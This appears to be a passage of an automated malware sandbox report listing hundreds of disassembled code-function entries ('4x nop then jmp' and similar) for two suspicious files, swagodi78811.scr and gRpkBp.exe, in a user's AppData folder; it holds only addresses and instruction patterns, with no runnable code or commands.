                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00209B83h20_2_00209A08
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0020FD91h20_2_0020FAB1
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00209B83h20_2_00209AB2
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00206544h20_2_002063A8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0020EFC9h20_2_0020ECE8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00206544h20_2_00206593
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0020F8F9h20_2_0020F619
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067F372h20_2_0067F078
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00671571h20_2_006712A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00678A42h20_2_00678748
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00672339h20_2_00672068
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00676349h20_2_00676078
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00670311h20_2_00670040
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00674321h20_2_00674050
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00677ED9h20_2_00677C08
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00678F0Ah20_2_00678C10
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006747B9h20_2_006744E8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067ABBAh20_2_0067A8C0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006707A9h20_2_006704D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006793D2h20_2_006790D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00678412h20_2_006780A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067C3A2h20_2_0067C0A8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067DB8Ah20_2_0067D890
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00670C41h20_2_00670970
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067C86Ah20_2_0067C570
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067F83Ah20_2_0067F540
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067E052h20_2_0067DD58
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006727D1h20_2_00672500
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006767E1h20_2_00676510
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067989Ah20_2_006795A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00676C7Ah20_2_006769A8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00674C51h20_2_00674980
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067B082h20_2_0067AD88
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00672C69h20_2_00672998
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00679D62h20_2_00679A68
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00677111h20_2_00676E40
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067B54Ah20_2_0067B250
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067E51Ah20_2_0067E220
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00673101h20_2_00672E30
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067CD32h20_2_0067CA38
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006710D9h20_2_00670E08
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067FD02h20_2_0067FA08
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006750E9h20_2_00674E18
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067E9E2h20_2_0067E6E8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00673599h20_2_006732C8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006775A9h20_2_006772D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00675581h20_2_006752B0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00673A31h20_2_00673760
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00677A41h20_2_00677770
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00675A19h20_2_00675748
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067A22Ah20_2_00679F30
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00671A09h20_2_00671738
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067D1FAh20_2_0067CF00
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067BA12h20_2_0067B718
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00675EB1h20_2_00675BE0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067BEDAh20_2_0067BBE0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00673EA1h20_2_00673BF8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067A6F2h20_2_0067A3F8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067D6C2h20_2_0067D3C8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00671EA1h20_2_00671BD0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067EEAAh20_2_0067EBB0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D4162h20_2_006D3E68
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D033Ah20_2_006D0040
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D1B22h20_2_006D1828
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D330Ah20_2_006D3010
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D1FEAh20_2_006D1CF0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D37D2h20_2_006D34D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D297Bh20_2_006D2680
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D1192h20_2_006D0E98
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D165Ah20_2_006D1360
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D2E42h20_2_006D2B48
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D0802h20_2_006D0508
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D0CCAh20_2_006D09D0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D3C9Ah20_2_006D39A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D24B2h20_2_006D21B8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BB5C1h20_2_021BB318
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BF0E1h20_2_021BEE10
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B92A9h20_2_021B9000
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B62E1h20_2_021B6038
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B55D9h20_2_021B5330
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BDCD9h20_2_021BDA30
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BCFD1h20_2_021BCD28
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B48D1h20_2_021B4628
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BC2C9h20_2_021BC020
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B3BC9h20_2_021B3920
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B9701h20_2_021B9458
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B89F9h20_2_021B8750
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B7CF1h20_2_021B7A48
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BFA11h20_2_021BF740
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B6FE9h20_2_021B6D40
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B4021h20_2_021B3D78
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BC721h20_2_021BC478
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BEC49h20_2_021BE978
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BBA19h20_2_021BB770
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B3319h20_2_021B3070
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BAD11h20_2_021BAA68
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B7441h20_2_021B7198
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B6739h20_2_021B6490
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B5A31h20_2_021B5788
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BE1C5h20_2_021BDE88
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BD429h20_2_021BD180
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B4D29h20_2_021B4A80
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B9B59h20_2_021B98B0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BF579h20_2_021BF2A8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B8E51h20_2_021B8BA8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B8149h20_2_021B7EA0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B5181h20_2_021B4ED8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BD881h20_2_021BD5D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BCB7Bh20_2_021BC8D0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B4479h20_2_021B41D0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B3771h20_2_021B34C8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BBE71h20_2_021BBBC8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BB169h20_2_021BAEC0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B85A1h20_2_021B82F8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B7899h20_2_021B75F0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B6B91h20_2_021B68E8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B5E89h20_2_021B5BE0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BE7B1h20_2_021BE4E0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_022E5F28
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_022E5F38
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_022E2B00
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_022E2E16
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_022E2A50
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_022E29CE
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00591496h22_2_005916F4
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00209449h29_2_00209188
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h29_2_00206C80
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00209A0Bh29_2_002095F8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00207945h29_2_00207758
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 002082CFh29_2_00207758
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 002067D4h29_2_00206823
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0020F2E9h29_2_0020F009
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0020FC19h29_2_0020F939
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00209A0Bh29_2_0020993A
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h29_2_002072B2
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0020EE51h29_2_0020EB3A
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0020F781h29_2_0020F4A1
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h29_2_00207491
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 002067D4h29_2_00206638
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9F372h29_2_00A9F078
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A927D1h29_2_00A92500
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A98A42h29_2_00A98748
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9C3A2h29_2_00A9C0A8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A98412h29_2_00A980A0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9DB8Ah29_2_00A9D890
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A947B9h29_2_00A944E8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9ABBAh29_2_00A9A8C0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A907A9h29_2_00A904D8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A993D2h29_2_00A990D8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A97ED9h29_2_00A97C08
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A98F0Ah29_2_00A98C10
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A92339h29_2_00A92068
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A96349h29_2_00A96078
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A90311h29_2_00A90040
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A94321h29_2_00A94050
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A96C7Ah29_2_00A969A8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9989Ah29_2_00A995A0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9B082h29_2_00A9AD88
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A94C51h29_2_00A94980
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A92C69h29_2_00A92998
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A967E1h29_2_00A96510
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A90C41h29_2_00A90970
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9C86Ah29_2_00A9C570
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9F83Ah29_2_00A9F540
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9E052h29_2_00A9DD58
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A91571h29_2_00A912A0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A95581h29_2_00A952B0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9E9E2h29_2_00A9E6E8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A93599h29_2_00A932C8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A975A9h29_2_00A972D8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9E51Ah29_2_00A9E220
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9CD32h29_2_00A9CA38
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A93101h29_2_00A92E30
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A910D9h29_2_00A90E08
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9FD02h29_2_00A9FA08
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A950E9h29_2_00A94E18
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A99D62h29_2_00A99A68
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A97111h29_2_00A96E40
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9B54Ah29_2_00A9B250
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9EEAAh29_2_00A9EBB0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A95EB1h29_2_00A95BE0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9BEDAh29_2_00A9BBE0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A93EA1h29_2_00A93BF8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9A6F2h29_2_00A9A3F8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9D6C2h29_2_00A9D3C8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A91EA1h29_2_00A91BD0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A91A09h29_2_00A91738
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9A22Ah29_2_00A99F30
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9D1FAh29_2_00A9CF00
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A9BA12h29_2_00A9B718
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A93A31h29_2_00A93760
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A97A41h29_2_00A97770
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 00A95A19h29_2_00A95748
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 020F330Ah29_2_020F3010
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 020F1B22h29_2_020F1828
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 020F033Ah29_2_020F0040
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 020F4162h29_2_020F3E68
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 020F297Bh29_2_020F2680
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 020F1192h29_2_020F0E98
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 020F37D2h29_2_020F34D8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 020F1FEAh29_2_020F1CF0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 020F0802h29_2_020F0508
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 020F2E42h29_2_020F2B48
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 020F165Ah29_2_020F1360
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 020F3C9Ah29_2_020F39A0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 020F24B2h29_2_020F21B8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 020F0CCAh29_2_020F09D0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227C2C9h29_2_0227C020
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02273BC9h29_2_02273920
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227CFD1h29_2_0227CD28
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 022748D1h29_2_02274628
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 022755D9h29_2_02275330
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227DCD9h29_2_0227DA30
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 022762E1h29_2_02276038
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 022792A9h29_2_02279000
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227F0E1h29_2_0227EE10
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227B5C1h29_2_0227B318
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227AD11h29_2_0227AA68
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227BA19h29_2_0227B770
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02273319h29_2_02273070
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02274021h29_2_02273D78
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227C721h29_2_0227C478
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227EC49h29_2_0227E978
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227FA11h29_2_0227F740
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02276FE9h29_2_02276D40
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02277CF1h29_2_02277A48
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 022789F9h29_2_02278750
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02279701h29_2_02279458
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02278149h29_2_02277EA0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227F579h29_2_0227F2A8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02278E51h29_2_02278BA8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02279B59h29_2_022798B0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227D429h29_2_0227D180
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02274D29h29_2_02274A80
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02275A31h29_2_02275788
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227E1C5h29_2_0227DE88
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02276739h29_2_02276490
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02277441h29_2_02277198
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02275E89h29_2_02275BE0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227E7B1h29_2_0227E4E0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02276B91h29_2_022768E8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02277899h29_2_022775F0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 022785A1h29_2_022782F8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227B169h29_2_0227AEC0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227BE71h29_2_0227BBC8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02273771h29_2_022734C8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227CB7Bh29_2_0227C8D0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02274479h29_2_022741D0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 02275181h29_2_02274ED8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then jmp 0227D881h29_2_0227D5D8
